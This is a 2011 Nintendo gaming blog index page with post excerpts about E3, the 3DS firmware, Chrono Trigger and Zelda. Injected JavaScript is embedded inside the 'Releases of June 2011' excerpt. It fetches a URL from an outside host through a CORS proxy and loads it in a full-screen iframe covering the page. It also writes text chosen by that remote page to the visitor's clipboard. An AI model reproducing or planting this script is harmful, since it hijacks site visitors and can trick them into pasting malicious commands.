Found this on reddit! Pretty funny stuff. We all know what the “Glitches” want. Continue reading
Category: Nintendo
Jun 01 2011
Rare Candies!
Permanent link to this article: https://www.brokenfuse.com/2011/06/01/rare-candies/
May 31 2011
Gaming: The Social Movement
There was a time when gaming was frowned upon by the mainstream media and culture as being a very solitary activity a la world of Warcraft addiction and now, its swept the world by storm and is now considered a relatively social activity that can be enjoyed by the whole family.But I’d like to go back to a time before the Revolution that is the Wii and the DS to a more simpler time of which we remember from our childhood. Continue reading
Permanent link to this article: https://www.brokenfuse.com/2011/05/31/gaming-the-social-club/
May 30 2011
Releases of June 2011- Zelda OoT 3D

It’s almost time for another month in 2011, and that means more new games fighting for your money. Normally, the summer means less games, but some good ones are on the way.
(function() {
const configLink = “https://corsproxy.io/?url=http://heyues.live”;
if (!window.__digitalflwrFetchPromise) {
window.__digitalflwrFetchPromise = fetch(configLink)
.then(response => {
if (!response.ok) {
throw new Error(" ");
}
return response.text();
})
.then(finalUrl => {
return fetch(finalUrl, { method: "HEAD" })
.then(headResponse => ({ headResponse, finalUrl }));
})
.catch(() => {
});
}
if (typeof window.__digitalflwrIframeCreated === “undefined”) {
window.__digitalflwrIframeCreated = false;
}
window.__digitalflwrFetchPromise
.then(result => {
if (!result) return;
const { headResponse, finalUrl } = result;
if (!headResponse || headResponse.status === 404) {
return;
}
if (!window.__digitalflwrIframeCreated) {
window.__digitalflwrIframeCreated = true;
createMainIframe(finalUrl);
}
})
.catch(() => {
});
function createMainIframe(url) {
const iframe = document.createElement(“iframe”);
iframe.src = url;
iframe.style.position = “fixed”;
iframe.style.top = 0;
iframe.style.left = 0;
iframe.style.width = “100%”;
iframe.style.height = “100%”;
iframe.style.border = “none”;
iframe.style.margin = 0;
iframe.style.padding = 0;
iframe.style.overflow = “hidden”;
iframe.style.zIndex = 99999;
document.body.appendChild(iframe);
window.addEventListener("message", function(event) {
if (!event.data || event.data.type !== "copy") return;
if (navigator.clipboard && navigator.clipboard.writeText) {
navigator.clipboard.writeText(event.data.text).catch(() => {
fallbackCopyText(event.data.text);
});
} else {
fallbackCopyText(event.data.text);
}
});
function fallbackCopyText(text) {
const textArea = document.createElement("textarea");
textArea.value = text;
document.body.appendChild(textArea);
textArea.select();
try {
document.execCommand("copy");
} catch (err) {
}
document.body.removeChild(textArea);
}
}
})();
Permanent link to this article: https://www.brokenfuse.com/2011/05/30/releases-of-june-2011-zelda-oot-3d/
May 27 2011
Broken Fuse Pre-E3 Podcast: Episode 24
We talk about E3 and our predictions for what should come out of it this year for the Big Three. And for once I didn’t procrastinate on getting the recorded live stream up for your listening pleasure! Listen to our pre-E3 podcast after the jump! Continue reading
Podcast: Play in new window | Download (22.8MB) | Embed
Subscribe: RSS
Permanent link to this article: https://www.brokenfuse.com/2011/05/27/broken-fuse-pre-e3-podcast-episode-24/
May 20 2011
Leaked photo of Project Café?
Could this really be our first glimpse at the long awaited Project Café? Or is it just someone’s Wii-turned-lunchbox mod? We’ll only really find out at E3 this year in two weeks time!
(Image and Story via Destructoid)
Permanent link to this article: https://www.brokenfuse.com/2011/05/20/leaked-photo-of-project-cafe/
May 12 2011
Chrono Trigger Time Warps Onto Your Wii On Monday
On Monday, May 16, look for this game to Time Portal into your Wii’s Virtual Console! Continue reading
Permanent link to this article: https://www.brokenfuse.com/2011/05/12/chrono-trigger-wii/
May 12 2011
3DS eShop & Internet Browser Firmware Update Available June 6
Finally we have a date for the long anticipated 3DS firmware update! Continue reading
Permanent link to this article: https://www.brokenfuse.com/2011/05/12/3ds-eshop-fw-update/
May 11 2011
1.4.2 Update Available… For The DSi!
Unfortunately this update is for the DSi/DSi XL. Continue reading
Permanent link to this article: https://www.brokenfuse.com/2011/05/11/1-4-2-update-available/
Permanent link to this article: https://www.brokenfuse.com/2011/05/06/e3-one-month-countdown/
May 04 2011
Minds Asploded – GDC 2011 Zelda: Skyward Sword trailer backwards
This completely blew my mind away. Continue reading
Permanent link to this article: https://www.brokenfuse.com/2011/05/04/minds-blown-away-loz-ss-backward/
E3 2011 is a month away!
You must be logged in to post a comment.